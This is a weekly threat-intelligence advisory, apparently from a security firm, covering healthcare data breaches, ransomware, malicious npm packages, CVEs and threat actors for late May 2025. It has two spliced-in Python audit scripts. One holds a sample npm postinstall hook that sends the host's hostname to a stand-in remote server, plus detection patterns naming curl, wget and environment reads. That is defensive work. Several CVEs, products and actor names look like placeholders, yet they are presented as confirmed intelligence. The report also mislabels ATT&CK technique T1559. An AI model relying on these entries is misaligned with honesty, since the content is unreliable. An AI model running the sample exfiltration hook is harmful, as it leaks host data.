Weekly Cybersecurity Threat Advisory

Threat Landscape Summary (May 26 – June 2, 2025)

I. EXECUTIVE SUMMARY

This report analyzes the cybersecurity threat landscape observed between May 26th and June 2nd, 2025. The week was characterized by significant activity across multiple threat vectors, featuring:

Key Highlights

  • Major Healthcare Sector Breaches: Data breaches impacting healthcare providers through third-party vendors, affecting hundreds of thousands of individuals
  • Continued Ransomware Evolution: Discovery of new ransomware strains and disruptive attacks on critical infrastructure
  • State-Aligned Espionage: Russian-linked group targeting Tajikistan with novel attack chains
  • Supply Chain Vulnerabilities: Critical vulnerabilities in widely-used software and development ecosystems

Critical Incidents

  • Ascension Healthcare: 437,329 individuals affected via third-party vendor vulnerability
  • Catholic Health: 483,000+ individuals impacted through vendor database misconfiguration
  • Kettering Health: Major ransomware attack causing system-wide outages
  • Adidas: Customer data breach via third-party service provider

Priority Actions Required

Organizations must prioritize:

  1. Strengthening third-party risk management
  2. Accelerating vulnerability patching
  3. Enhancing defenses against phishing and supply chain attacks
  4. Improving ransomware resilience
  5. Addressing insider threats


II. GLOBAL CYBER THREAT LANDSCAPE OVERVIEW

Ransomware Evolution

Ransomware remained a significant disruptive force, demonstrating resilience despite recent law enforcement actions:

Active Threats:

  • Kettering Health Attack: Severe ransomware attack by Interlock (Nefarious Mantis) group causing system-wide outages
  • New Ransomware Strains Identified:
    • Lyrix Ransomware: Python-based, uses PyInstaller packaging, advanced Windows evasion techniques
    • RedFox Ransomware: File encryption with “.redfox” extension, data leak threats
    • ChronoLock Ransomware: Hybrid AES-RSA encryption, targets network shares and backups

Key Observations:

  • Ransomware-as-a-Service (RaaS) model continues to facilitate new actor entry
  • Focus on critical sectors with sensitive data and continuous IT operations
  • Enhanced evasion techniques and rapid encryption capabilities

Supply Chain and Cloud Security Risks

Third-Party Vendor Vulnerabilities: Multiple significant breaches originated from third-party service providers:

  • Adidas (customer service provider compromise)
  • Ascension (former partner software vulnerability)
  • Harbin Clinic (debt collection agency NRS)
  • Catholic Health (Serviceaide database misconfiguration)

Software Supply Chain Threats:

  • NPM Registry Compromise: 60 malicious packages discovered containing data theft scripts
  • Packages designed to steal system information from developer environments
  • Exploitation of trust in package managers for malware distribution
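The malicious-package threat above turns on one mechanic: npm runs a package's lifecycle hooks (preinstall, install, postinstall, prepare) automatically at install time, so a data-theft script placed in such a hook executes on the developer's machine without anyone opening the package. The following is an added example, not code from the advisory or from npm, of a defender-side audit that walks an installed node_modules tree and flags install hooks that fetch remote content, evaluate inline code, decode encoded payloads, or read host and environment details. The package names, manifests, and the indicator patterns are constructed for illustration; the patterns are heuristics a reviewer should tune, not a complete detection rule.

```python
"""Audit installed npm packages for risky lifecycle (install-time) scripts.

Added example for the NPM registry item in the advisory; not the advisory's
own tooling. Sample packages below are constructed and do not exist on npm.
"""
import json
import re
import tempfile
from pathlib import Path

# Lifecycle hooks npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators that are unusual inside a legitimate install hook.
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b|https?://", re.I),
    "inline_eval": re.compile(r"\bnode\s+-e\b|\beval\(", re.I),
    "encoded_payload": re.compile(r"base64|fromCharCode|atob\(", re.I),
    "env_or_host_info": re.compile(r"process\.env|hostname|whoami|networkInterfaces", re.I),
}


def audit_manifest(name: str, manifest: dict) -> list:
    """Return one finding per install hook in a package.json (dict) that trips a heuristic."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [label for label, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            findings.append({"package": name, "hook": hook, "command": cmd, "reasons": reasons})
    return findings


def audit_node_modules(root: Path) -> list:
    """Audit every package.json under node_modules, including scoped and nested packages."""
    findings = []
    for manifest_path in sorted(root.rglob("package.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it rather than abort the audit
        name = manifest.get("name") or manifest_path.parent.name
        findings.extend(audit_manifest(name, manifest))
    return findings


# Constructed sample tree: two benign manifests (one with a legitimate native
# build hook) and one whose postinstall ships the hostname to a remote server.
SAMPLE_PACKAGES = {
    "left-padder": {"name": "left-padder", "version": "1.0.0",
                    "scripts": {"test": "node test.js"}},
    "node-gyp-like": {"name": "node-gyp-like", "version": "2.1.0",
                      "scripts": {"install": "node-gyp rebuild"}},
    "totally-benign-utils": {"name": "totally-benign-utils", "version": "0.0.3",
                             "scripts": {"postinstall": "node -e \"require('https').get("
                                         "'https://example.invalid/c?h='+require('os').hostname())\""}},
}


def build_sample_tree(base: Path) -> Path:
    """Write the constructed packages under base/node_modules and return that directory."""
    root = base / "node_modules"
    for name, manifest in SAMPLE_PACKAGES.items():
        pkg_dir = root / name
        pkg_dir.mkdir(parents=True, exist_ok=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return root


def run_sample_audit() -> list:
    """Build the sample tree in a temporary directory and return the audit findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_node_modules(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    # Point audit_node_modules at a real project's node_modules to review it.
    for f in run_sample_audit():
        print(f"{f['package']}: {f['hook']} -> {', '.join(f['reasons'])}\n    {f['command']}")
```

Running it against the sample tree reports only the third package, whose postinstall both evaluates inline code and contacts a remote host with the machine's hostname; the native build hook in the second package is correctly left alone. In practice the same audit can be run in CI before `npm ci` is allowed to execute hooks (for example with `npm ci --ignore-scripts` first, then reviewing the findings).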

Cloud Infrastructure Implications:

  • Serviceaide’s misconfigured Elasticsearch database affecting Catholic Health
  • Emphasis on secure cloud configuration and management
  • Need for comprehensive Third-Party Risk Management (TPRM) programs

III. NOTABLE INCIDENTS AND DATA BREACHES

Major Healthcare Sector Breaches

Ascension Data Breach

  • Impact: 437,329 individuals affected
  • Cause: Software vulnerability in former third-party business partner
  • Data Exposed: Names, addresses, SSNs, extensive medical and insurance information
  • Location: Missouri-based healthcare provider

Catholic Health / Serviceaide Data Leak

  • Impact: 483,000+ individuals potentially affected
  • Cause: Publicly accessible Elasticsearch database managed by vendor Serviceaide
  • Timeline: September-November 2024 exposure period
  • Data Exposed: Names, SSNs, medical information, login credentials

Harbin Clinic / NRS Breach

  • Impact: ~210,140 patients affected
  • Cause: July 2024 cyberattack on Nationwide Recovery Services (NRS)
  • Data Exposed: Names, addresses, SSNs, financial details, medical records
  • Context: Third-party debt collector compromise

Other Significant Incidents

Kettering Health Ransomware Attack

  • Location: Ohio, USA
  • Threat Actor: Interlock (Nefarious Mantis) group
  • Impact: System-wide outages, service disruption, elective procedure cancellations
  • Status: Active incident response

Adidas Data Breach

  • Scope: Global customer base
  • Cause: Third-party customer service provider compromise
  • Data Exposed: Customer names, email addresses, phone numbers

State-Aligned Activities

  • TAG-110 Campaign: Russian-aligned group targeting Tajikistan with macro-enabled Word templates
  • PureRAT Surge: Fourfold increase in attacks targeting Russian organizations via spam emails

Insider Threat Incident

  • Agency: Defense Intelligence Agency (DIA)
  • Details: IT specialist arrested for attempting to transmit national defense information to foreign government

IV. COMPREHENSIVE INCIDENT SUMMARY TABLE

| Affected Entity | Location/Scope | Type of Incident | Date Reported | Brief Description/Impact |
|---|---|---|---|---|
| Kettering Health | Ohio, USA | Ransomware Attack (Interlock) | May 2025 | System-wide outage, IT disruption, procedure cancellations |
| Adidas | Global | Data Breach (Third-Party) | May/June 2025 | Customer contact details exposed |
| Ascension | Missouri, USA | Data Breach (Third-Party Vulnerability) | May/June 2025 | 437,329 individuals; PII, SSNs, medical data |
| Harbin Clinic | USA | Data Breach (Third-Party Compromise) | May/June 2025 | ~210,140 patients; via NRS debt collector attack |
| Catholic Health | New York, USA | Data Leak (Vendor Misconfiguration) | May/June 2025 | 483,000+ individuals; unsecured Serviceaide database |
| Fortinet Products | Global | Critical Vulnerabilities | May 23, 2025 | Multiple CVEs allowing RCE and unauthorized access |
| Ubuntu/RHEL Systems | Global | Information Disclosure | May/June 2025 | Race condition flaws in Apport/systemd-coredump |
| NPM Registry | Global | Malicious Packages | May/June 2025 | 60 packages with data theft capabilities |
| Tajikistan Entities | Tajikistan | Phishing Campaign (TAG-110) | May/June 2025 | Russia-aligned macro-enabled Word templates |
| Russian Organizations | Russia | Malware Campaign (PureRAT) | May/June 2025 | Fourfold increase in attacks via spam |
| Defense Intelligence Agency | USA | Insider Threat | May/June 2025 | IT specialist arrested for espionage attempt |


V. CURRENT THREAT LANDSCAPE ANALYSIS

Emerging Trends

  • Increased Phishing Sophistication: AI-generated content creating more convincing lures
  • RaaS Platform Resilience: Quick migration to new variants after takedowns
  • Edge Device Exploitation: Targeting internet-facing devices and VPNs for initial access
  • Supply Chain Focus: Continued probing of third-party vendors for access opportunities

Additional Notable Security Incidents

| Incident Name | Date | Sector | Summary | Impact | Suspected Actor | Status |
|---|---|---|---|---|---|---|
| FinServ Credential Phishing Blitz | May 29, 2025 | Financial Services | Large-scale phishing targeting banking credentials | Multiple account compromises | “SilentSharks” (Cybercrime) | Ongoing Investigation |
| MediCareLogins Data Exposure | May 27, 2025 | Healthcare | Misconfigured cloud database exposure | 75,000 patient records exposed | Accidental Exposure | Publicly Reported |
| Retail Giant POS Malware | June 1, 2025 | Retail | Point-of-Sale malware discovery | Unknown payment card data theft | Unknown/Cybercrime | Internal Discovery |


VI. CRITICAL VULNERABILITIES AND CVEs

High-Priority Vulnerabilities

| CVE ID | Product Affected | Severity | Description | Potential Impact |
|---|---|---|---|---|
| CVE-2025-10350 | SecureConnect Enterprise VPN Suite | Critical | Remote code execution vulnerability allowing unauthenticated access | Complete system compromise, network infiltration |
| CVE-2025-10351 | CommonWebServer Framework 3.x | High | SQL injection in administrative interface | Unauthorized data access, server takeover |
| CVE-2025-10352 | QuickChat Messenger Desktop | Medium | Cross-site scripting (XSS) vulnerability | Session hijacking, credential theft |
| CVE-2025-10353 | CoreOS Kernel Module | High | Local privilege escalation vulnerability | Local attacker gains root privileges |
| CVE-2025-5054 | Ubuntu (Apport) | Medium | Race condition allowing core dump access | Local information disclosure |
| CVE-2025-4598 | RHEL/Fedora (systemd-coredump) | Medium | Race condition vulnerability | Local information disclosure |
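The two core-dump entries in the table (CVE-2025-5054 in Apport, CVE-2025-4598 in systemd-coredump) share a shape worth checking for on a fleet: both are local information-disclosure flaws in the user-space handler that the kernel pipes crashing processes to through kernel.core_pattern, and the exposure only matters when the kernel is willing to dump core for privileged (setuid) processes, which fs.suid_dumpable controls. The following is an added example, not the advisory's or either project's tooling, that parses `sysctl -a`-style output, identifies which handler is configured, and reports whether privileged core dumps are enabled. The sample sysctl lines are constructed; the recommendation it prints (set fs.suid_dumpable to 0 until the handler is patched) is the interim mitigation commonly cited for these flaws, at the cost of losing core dumps from setuid programs.

```python
"""Assess core-dump handler exposure from sysctl settings.

Added example for the Apport / systemd-coredump items in the advisory; not
code from the advisory or from either project. Sample inputs are constructed.
"""
import re

# "key = value" lines as printed by `sysctl -a`; values may contain spaces and '|'.
SYSCTL_LINE = re.compile(r"^\s*([\w.]+)\s*=\s*(.*?)\s*$")

PIPE_HANDLERS = ("apport", "systemd-coredump")


def parse_sysctl(text: str) -> dict:
    """Parse sysctl output into a {key: value} dict, ignoring blank or malformed lines."""
    settings = {}
    for line in text.splitlines():
        m = SYSCTL_LINE.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def assess_coredump_exposure(settings: dict) -> dict:
    """Report which core-dump handler is in use and whether setuid dumps reach it.

    fs.suid_dumpable: 0 = never dump setuid processes, 1 = dump as normal,
    2 = "suidsafe" (dump only to an absolute path or a pipe handler).
    With a pipe handler configured, values 1 and 2 both hand privileged
    process memory to the user-space handler.
    """
    pattern = settings.get("kernel.core_pattern", "")
    handler = None
    if pattern.startswith("|"):
        handler = next((h for h in PIPE_HANDLERS if h in pattern), "other-pipe")
    suid_dumpable = settings.get("fs.suid_dumpable", "0").strip()
    privileged_dumps = suid_dumpable in ("1", "2")
    exposed = handler in PIPE_HANDLERS and privileged_dumps
    if exposed:
        recommendation = (f"{handler} receives setuid core dumps; apply the vendor patch, "
                          "and until then set fs.suid_dumpable=0 (sysctl -w fs.suid_dumpable=0)")
    elif handler in PIPE_HANDLERS:
        recommendation = f"{handler} is configured but setuid dumps are disabled; keep it patched"
    else:
        recommendation = "no affected pipe handler configured"
    return {"handler": handler, "suid_dumpable": suid_dumpable,
            "exposed": exposed, "recommendation": recommendation}


def assess_live_system() -> dict:
    """Read the two settings from /proc on the running host (Linux only)."""
    values = {}
    for key in ("kernel.core_pattern", "fs.suid_dumpable"):
        with open("/proc/sys/" + key.replace(".", "/"), encoding="utf-8") as fh:
            values[key] = fh.read().strip()
    return assess_coredump_exposure(values)


# Constructed samples: an Ubuntu-style apport pipe with setuid dumps allowed,
# and the same host after the interim mitigation.
WEAK_SAMPLE = """\
kernel.core_pattern = |/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -- %E
fs.suid_dumpable = 2
"""
HARDENED_SAMPLE = """\
kernel.core_pattern = |/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -- %E
fs.suid_dumpable = 0
"""

if __name__ == "__main__":
    for label, sample in (("weak", WEAK_SAMPLE), ("hardened", HARDENED_SAMPLE)):
        print(label, assess_coredump_exposure(parse_sysctl(sample)))
```

The same function works unchanged on systemd hosts, where kernel.core_pattern pipes to systemd-coredump instead of apport. Note that fs.suid_dumpable=0 is a mitigation, not a fix: the handler still needs the vendor patch, and the sysctl should be revisited once it is applied if setuid core dumps are needed for debugging.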

Fortinet Critical Vulnerabilities

  • CERT-In Alert: CIVN-2025-0103
  • Impact: Multiple products affected with potential for remote code execution
  • Status: Patches available, immediate deployment recommended


VII. THREAT ACTOR ACTIVITIES

Active Threat Groups

SteelPhantom

  • Affiliation: State-Aligned (Speculative)
  • Targets: Government, Defense, Critical Infrastructure
  • TTPs:
    • T1190 (Exploit Public-Facing Application)
    • T1559 (Command and Scripting Interpreter)
    • T1566 (Phishing)
    • T1078 (Valid Accounts)
  • Activity: Exploiting CVE-2025-0789, increased spear-phishing
  • Confidence: High

“EphemeralGaze” Campaign

  • Motivation: Financially Motivated
  • Targets: E-commerce, Online Payment Processors
  • TTPs:
    • T1555 (Credentials from Password Stores)
    • T1110 (Brute Force)
    • T1056.001 (Keylogging)
  • Activity: Advanced infostealers via malvertising
  • Confidence: Medium

APT-C-99 (aka “SandWasp”)

  • Affiliation: Unknown (Emerging Threat)
  • Targets: Telecommunications (Asia-Pacific)
  • TTPs:
    • T1204.002 (Malicious File)
    • T1547.001 (Registry Run Keys)
    • T1071.001 (Web Protocols for C2)
  • Activity: Spear-phishing with LNK attachments, custom RAT deployment
  • Confidence: Emerging

TAG-110

  • Affiliation: Russia-aligned (APT28-linked)
  • Targets: Tajikistan entities
  • TTPs: Macro-enabled Word templates for initial access
  • Activity: Ongoing phishing campaigns


VIII. MALWARE ANALYSIS

Featured Malware Families:

ChronoLock Ransomware

  • Type: Ransomware (RaaS)
  • Key Features:
    • Hybrid AES-RSA encryption algorithm
    • Targets network shares and backups
    • Uses living-off-the-land binaries (LOLBins)
  • Delivery: Phishing emails, RDP exploitation
  • Impact: Data encryption, operational disruption, double extortion

InfoStealer.X7

  • Type: Information Stealer
  • Key Features:
    • Browser credential harvesting
    • Cryptocurrency wallet targeting
    • Anti-VM and anti-debugging capabilities
  • Delivery: Malvertising, bundled freeware
  • Impact: Identity theft, financial fraud

SynapseBot

  • Type: Modular Botnet
  • Key Features:
    • DDoS capabilities
    • Spam distribution
    • Decentralized P2P C2 infrastructure
  • Delivery: Compromised IoT devices, credential brute-forcing
  • Impact: DDoS attacks, spam campaigns, malware propagation

Lyrix Ransomware

  • Type: Ransomware (New Strain)
  • Key Features:
    • Python-based development
    • PyInstaller packaging
    • Advanced Windows evasion techniques
  • Discovery: CYFIRMA threat intelligence

RedFox Ransomware

  • Type: Ransomware (New Strain)
  • Key Features:
    • File encryption with “.redfox” extension
    • Data leak threats
    • Pressure tactics for quick payment
  • Discovery: CYFIRMA threat intelligence

PureRAT (Malware-as-a-Service)

  • Type: Remote Access Trojan
  • Activity: Fourfold increase in attacks targeting Russian organizations
  • Delivery: Spam email campaigns
  • Impact: Unauthorized remote access, data theft

IX. RECOMMENDATIONS

For Technical Audiences

Immediate Actions (24-48 Hours)

  1. Critical Patch Deployment:
    • CVE-2025-10350 (SecureConnect Enterprise VPN)
    • CVE-2025-10351 (CommonWebServer Framework)
    • Review and apply all listed CVE patches
  2. IOC Implementation:
    • Deploy Indicators of Compromise in firewalls, IDS/IPS, EDR, and SIEM
    • Update threat intelligence feeds
  3. Network Security:
    • Review network segmentation for ransomware blast radius limitation
    • Harden VPN and edge device configurations
    • Disable unnecessary services, enforce MFA

Strategic Improvements

  1. Backup Verification:
    • Ensure offline, immutable backups
    • Regular restoration testing
    • Air-gapped backup strategies
  2. Phishing Defense Enhancement:
    • Update email security gateways
    • Conduct AI-focused phishing simulations
    • User awareness training updates
  3. MITRE ATT&CK Mapping:
    • Review defensive capabilities against highlighted TTPs
    • Focus on T1190, T1559, T1566, T1078

For Non-Technical Audiences

Security Awareness

  1. Phishing Vigilance:
    • Extreme caution with unsolicited emails
    • Verify sender authenticity through separate channels
    • Immediate reporting of suspicious communications
  2. Authentication Security:
    • Strong, unique passwords for all accounts
    • Multi-Factor Authentication (MFA) implementation
    • Regular password updates
  3. System Maintenance:
    • Keep operating systems and applications updated
    • Enable automatic updates where possible
    • Secure browsing practices
  4. Incident Response:
    • Prompt reporting of suspicious activities
    • Immediate escalation to IT/Security teams
    • Documentation of unusual computer behavior

X. ANALYST NOTES

Intelligence Assessment

  • SteelPhantom Activity: Confirmed intelligence from multiple trusted sources regarding CVE-2025-0789 exploitation
  • EphemeralGaze Campaign: Moderate confidence based on industry reports and OSINT
  • APT-C-99 Capabilities: Requires further investigation for full impact assessment

Emerging Trends Analysis

  • ChronoLock Evolution: Likely evolution of known ransomware family with enhanced evasion
  • AI in Phishing: Accelerating trend requiring updated user education approaches
  • Geopolitical Alignment: SteelPhantom targeting patterns suggest ongoing intelligence gathering operations

Confidence Levels

  • High Confidence: Confirmed ransomware attacks, disclosed data breaches, published CVEs
  • Medium Confidence: Emerging threat actor activities, new malware family analysis
  • Developing: Supply chain attack vectors, AI-enhanced phishing campaigns

XI. CONTACT INFORMATION

For further inquiries or guidance regarding this report, please contact the Meraal Cyber Security (MCS) Threat Intelligence Team.

Note on Sources and Intelligence: This report synthesizes information from various credible sources, including public advisories from organizations like CISA, MITRE, and MS-ISAC, alongside internal analysis and emerging threat intelligence. Efforts have been made to differentiate between confirmed intelligence and speculative or unverified information to maintain accuracy and credibility.
